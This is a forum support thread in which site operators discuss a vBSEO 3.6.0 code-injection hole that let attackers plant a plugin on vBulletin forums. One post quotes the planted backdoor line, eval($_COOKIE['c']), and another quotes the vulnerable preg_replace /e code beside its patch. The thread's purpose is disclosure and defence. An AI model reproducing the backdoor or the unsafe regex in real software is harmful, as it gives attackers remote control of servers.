Announcement

Collapse
No announcement yet.

Possible Exploit

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Jafo
    replied
    Originally posted by Talaturen View Post
    It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
    You are wrong, the patch was NOT in 3.6.0 until we discovered this TODAY. I know, I checked.

    Leave a comment:


  • Loco.M
    replied
    Originally posted by Jafo View Post
    Here it is folks, in functions_vbseocp_abstract.php

    PHP Code:
    public static function proc_deutf($ptxt$tocharset)
    {
    $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')'$ptxt);
    return 
    $ptxt;

    I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

    PHP Code:
    public static function proc_deutf($ptxt$tocharset)
    {
    $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s =  iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s :  \'$1\').stripslashes(\'$2\')'$ptxt);
    return 
    $ptxt;

    Ouch.. that's a lot of sites at risk for a year..

    Leave a comment:


  • Talaturen
    replied
    It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!

    Leave a comment:


  • briansol
    replied
    http://www.vbseo.com/f5/vbseo-securi...release-52783/

    Leave a comment:


  • DigitalCrowd
    replied
    Yep, I removed it as soon as I saw it.

    Leave a comment:


  • Wayne Luke
    replied
    Originally posted by DigitalCrowd View Post
    I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:

    eval($_COOKIE['c']);

    Here is a site that references a PHP compromise with similar code...

    http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.dis9.com/tools&ei=nH8dT9XALMSKsQLH4dSdCw&sa=X&oi=translate&ct=result&resnum=2&ved=0CDYQ7gEwAQ&prev=/search%3Fq%3Deval(%24_COOKIE%5B%27c%27%5D)%3B%26hl%3Den%26safe%3Doff%26client%3Dsafari%26r ls%3Den%26prmd%3Dimvns

    This is a very bad plugin. Very bad. You need to remove it as quickly as possible. With it, your attackers could gain access to your entire server.

    Leave a comment:


  • briansol
    replied
    FYI, the bug has been confirmed and a patch release is enroute.

    Leave a comment:


  • kau
    replied
    It is vBSEO.

    All our non-vBSEO sites did not get hacked.

    All our vBSEO sites without "Add Page Titles to External Links Anchor Text" enabled did not get hacked.

    All our vBSEO sites with "Add Page Titles to External Links Anchor Text" enabled got hacked.

    We have every single directory properly permissioned via Apache CONF file and by hand issuing CHMOD commands. We also have our AdminCP in a different directory and it is password protected through .htpasswd.

    There are no entries in Control Panel logs that relate to this plugin creation. It was done via injection.

    Leave a comment:


  • Jafo
    replied
    Originally posted by Ace View Post
    Just in case - you do have the following .htaccess protection in all writable directories?

    Code:
    <Files ~ "\.(php\d*|cgi|pl|phtml)$">
    order allow,deny
    deny from all
    </Files>
    Yes we do and we even have admincp and vbseocp.php protected by apache auth..

    Trust me, the reason this happened is because that patch was missing.. Bots have been searching for this exploit for almost a year now.. When we upgraded to 3.6.0 the hole was reopened and the bots did what they do.

    Leave a comment:


  • Ace
    replied
    Just in case - you do have the following .htaccess protection in all writable directories?

    Code:
    <Files ~ "\.(php\d*|cgi|pl|phtml)$">
    order allow,deny
    deny from all
    </Files>

    Leave a comment:


  • Jafo
    replied
    Just got a confirmation from vbseo that the patch was in their repo, but not in the current version. They said they have updated the current version just now to include the patch.. I really hope they notify their customer base because this exploit is a year old. Bots are probably pre-programmed with this attack vector and there are likely hundreds of them. If you have updated vbseo in the last year, you stand a good chance of being vulnerable. UPGRADE YOUR INSTALL NOW!

    Leave a comment:


  • Jafo
    replied
    Brianso, please look at the above code.. We went through this a year ago, you guys worked with us to supply the patch, but you guys never included it in your product! That is why we got hit, because we just upgraded to the latest version.

    Leave a comment:


  • briansol
    replied
    Title replaces happen real-time as the page is pulled. These are not stored anywhere.

    I highly suggest checking your server logs for more detailed information or entries relating to product changes.

    Leave a comment:


  • Jafo
    replied
    Here it is folks, in functions_vbseocp_abstract.php

    PHP Code:
    public static function proc_deutf($ptxt$tocharset)
    {
    $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')'$ptxt);
    return 
    $ptxt;

    I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

    PHP Code:
    public static function proc_deutf($ptxt$tocharset)
    {
    $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s =  iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s :  \'$1\').stripslashes(\'$2\')'$ptxt);
    return 
    $ptxt;

    Last edited by Jafo; Mon 23 Jan '12, 7:32am.

    Leave a comment:


  • Ace
    replied
    OK. Best of luck figuring it out, I'm watching your ticket with great interest.

    <-- works there.

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X